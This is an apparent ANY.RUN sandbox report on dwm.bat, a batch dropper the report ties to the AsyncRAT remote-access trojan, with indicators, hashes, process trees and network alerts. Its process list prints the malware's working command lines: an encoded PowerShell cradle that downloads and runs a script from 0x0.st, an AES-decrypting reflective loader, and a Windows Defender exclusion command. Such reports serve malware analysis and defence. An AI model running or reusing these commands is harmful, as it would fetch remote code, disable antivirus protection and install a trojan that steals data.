File name:

dwm.bat

Full analysis: https://app.any.run/tasks/27f1a007-4225-484f-8ee1-f172dc1aa4d1
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: January 30, 2025, 08:27:28
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
stealer
fody
rat
asyncrat
remote
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (57718), with CRLF line terminators
MD5:

151B7FE444AF5423AD79C0C83558B402

SHA1:

664D48C7C188A5085FDE5A50842F63F5F2191BFE

SHA256:

DF22C1BF851BE9C64682E7838B6B88358C64A9E3FD6E8AD305F7303D06660323

SSDEEP:

12288:O3WghT6onokzHxgSVW0U/cBGnciS8mJa4Ce:4hT5i9/cBGhFmJaze

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3536)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 4120)

    • Known privilege escalation attack

      • dllhost.exe (PID: 3568)

    • Adds process to the Windows Defender exclusion list

      • dllhost.exe (PID: 3568)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 4120)

    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 4120)

  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3536)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3536)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1704)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1704)

    • Application launched itself

      • cmd.exe (PID: 1704)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3536)
      • dllhost.exe (PID: 3568)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6784)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 6784)

    • Script adds exclusion path to Windows Defender

      • dllhost.exe (PID: 3568)

    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 3568)

    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 4500)

    • Script adds exclusion process to Windows Defender

      • dllhost.exe (PID: 3568)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 4120)

    • Connects to unusual port

      • powershell.exe (PID: 4120)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4120)

  • INFO

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4500)

    • Checks supported languages

      • csc.exe (PID: 6784)
      • cvtres.exe (PID: 6920)

    • Disables trace logs

      • powershell.exe (PID: 4500)

    • Checks proxy server information

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)

    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 3536)
      • powershell.exe (PID: 4500)

    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 3536)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 6784)

    • Create files in a temporary directory

      • cvtres.exe (PID: 6920)
      • csc.exe (PID: 6784)

    • Creates files in the program directory

      • dllhost.exe (PID: 3568)

    • Detects Fody packer (YARA)

      • powershell.exe (PID: 4500)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3848)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3848)

    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6984)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
15
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe csc.exe cvtres.exe no specs cmstp.exe no specs CMSTPLUA powershell.exe no specs conhost.exe no specs #ASYNCRAT powershell.exe taskkill.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1704C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\dwm.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2144\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3536C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\dwm.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3568C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
3820\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3848powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
4120"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gamlqeHJrdXJjcmhzdXJzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnVFhPeWhHNkc0RTQzM3MyT0ZlMTlMdm5Gekd2VjBENS82d250aUx1TDZqOD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1pHa1o1c2M2UVhkcld6WFhZSUlrSHc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWVxdGJwb3hrdWxxbmR0KCRwYXJhbV92YXIpewlJRVggJyR1aGNtaW5rYWF3cGduenRsaXptbHBvd2ZlPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHVsemRndGhvand6cWhqZnhlcHdsaWJ4cWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkcmFyZGZsd2huYmx3dWNpcmRjdXZhcGhuPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJHVoY21pbmthYXdwZ256dGxpem1scG93ZmUsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGRyYXJkZmx3aG5ibHd1Y2lyZGN1dmFwaG4uQ29weVRvKCR1bHpkZ3Rob2p3enFoamZ4ZXB3bGlieHFpKTsJJGRyYXJkZmx3aG5ibHd1Y2lyZGN1dmFwaG4uRGlzcG9zZSgpOwkkdWhjbWlua2Fhd3Bnbnp0bGl6bWxwb3dmZS5EaXNwb3NlKCk7CSR1bHpkZ3Rob2p3enFoamZ4ZXB3bGlieHFpLkRpc3Bvc2UoKTsJJHVsemRndGhvand6cWhqZnhlcHdsaWJ4cWkuVG9BcnJheSgpO31mdW5jdGlvbiB6d2pncnd1eHNna3hwcWJkZHJmdHRlcGd0KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbHp6dHZ0bml1ZGNod2Zxb3Rhd2RtaHV0ZHJ4dXduY2NzZXNnbWNtdD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG9jY3JhYXZ5bWdjYXNlYmVlZnFldnNtZ2Fhb3Nta2NxbmNwamVkdGN2emlwbGJqbmNvPSRsenp0dnRuaXVkY2h3ZnFvdGF3ZG1odXRkcnh1d25jY3Nlc2dtY210LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG9jY3JhYXZ5bWdjYXNlYmVlZnFldnNtZ2Fhb3Nta2NxbmNwamVkdGN2emlwbGJqbmNvLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kb3lubmZjcnN1cGl2ZHBuZ21sa3htaGFqeSA9ICRlbnY6VVNFUk5BTUU7JGdqbmtiZWp1Z2djempudGd0amdlaWV0a3ogPSAnQzpcVXNlcnNcJyArICRveW5uZmNyc3VwaXZkcG5nbWxreG1oYWp5ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZ2pua2JlanVnZ2N6am50Z3RqZ2VpZXRrejskeWxrd2s9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRnam5rYmVqdWdnY3pqbnRndGpnZWlldGt6KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdHp4IGluICR5bGt3aykgewlpZiAoJHR6eC5TdGFydHNXaXRoKCc6OicpKQl7CQkkY3BjbGM9JHR6eC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kcGRub2hzdml5aXhqdnJkdGhsc2lubGJtZj1bc3RyaW5nW11dJGNwY2xjLlNwbGl0KCdcJyk7SUVYICckc3B0enl3bGZoZmZlYXR3dm5vc2dud3Z2Zz1pZXF0YnBveGt1bHFuZHQgKGppanhya3VyY3Joc3VycyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRwZG5vaHN2aXlpeGp2cmR0aGxzaW5sYm1mWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHJtbnBxZWJham9jY2l6bG1lb2x5cGhzd209aWVxdGJwb3hrdWxxbmR0IChqaWp4cmt1cmNyaHN1cnMgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkcGRub2hzdml5aXhqdnJkdGhsc2lubGJtZlsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6d2pncnd1eHNna3hwcWJkZHJmdHRlcGd0ICRzcHR6eXdsZmhmZmVhdHd2bm9zZ253dnZnICRudWxsO3p3amdyd3V4c2dreHBxYmRkcmZ0dGVwZ3QgJHJtbnBxZWJham9jY2l6bG1lb2x5cGhzd20gKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4500powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5652\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 222
Read events
18 196
Write events
26
Delete events
0

Modification events

(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3568) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:(6984) cmstp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:writeName:DesktopShortcut
Value:
0
(PID) Process:(3568) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:SM_AccessoriesName
Value:
Accessories
Executable files
2
Suspicious files
7
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
4500powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_frwn1tth.fjj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4500powershell.exeC:\Users\admin\AppData\Local\Temp\vyxgcijg.0.cstext
MD5:B126AC3DA39FFA35CB857267CBC70CBB
SHA256:6E6DD39153A84B94B4F309A4C4521260CBDD8A6922ADE46096F42DA39BC20B93
4500powershell.exeC:\Windows\Temp\dnb3vetm.inftext
MD5:05662B83FF7DB6317E391454787598D8
SHA256:0322B78214D9FB1D40D9BF162A44F9A5FE13FCB21C96B8B0F0E289E939A9FA5C
6784csc.exeC:\Users\admin\AppData\Local\Temp\CSC10A73122AECC4C8D9594F3EA6BEF9AB.TMPbinary
MD5:9505958D90497DCF4CE8D50DB32BF29F
SHA256:623D9855F1BE340A906693C228DCC868F93786ED01E6BC3427EFAC7269860676
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF139fcd.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6784csc.exeC:\Users\admin\AppData\Local\Temp\vyxgcijg.outtext
MD5:5859DC6A9DDD860D3A9F8D9DBAC9AE82
SHA256:18D6CBBEC1B24FE69585BDFD487870B363DFCD89EEC5905E56CBB70F913993FF
6920cvtres.exeC:\Users\admin\AppData\Local\Temp\RES9195.tmpbinary
MD5:EAFC9AEBC301A68060F47819BE7E5C34
SHA256:06F2F3027847C4D071183249E3BAC8F93BED794E9A4E06ABB6B3758544018A52
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256:0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RP5X48NBYGR8AYVSY94S.tempbinary
MD5:E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256:0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
4500powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:C56399F8B851B0DA3452FFFCBB9F6DB4
SHA256:79D31FEA7C6E4297969DC4164156EB807CC6EF4E571AC90CCD02BE66B7EAE7F7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
33
DNS requests
16
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6700
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1344
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
104.126.37.128:443
Akamai International B.V.
DE
unknown
3976
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4500
powershell.exe
168.119.145.117:443
0x0.st
Hetzner Online GmbH
DE
suspicious
5064
SearchApp.exe
104.126.37.176:443
Akamai International B.V.
DE
unknown
5064
SearchApp.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1176
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
www.microsoft.com
  • 184.30.21.171
whitelisted
0x0.st
  • 168.119.145.117
unknown
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.128
  • 20.190.160.130
  • 40.126.32.140
  • 40.126.32.133
  • 40.126.32.74
  • 20.190.160.67
  • 20.190.160.17
whitelisted
go.microsoft.com
  • 184.30.18.9
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
4500
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
4120
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
4120
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
4120
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
dwm.bat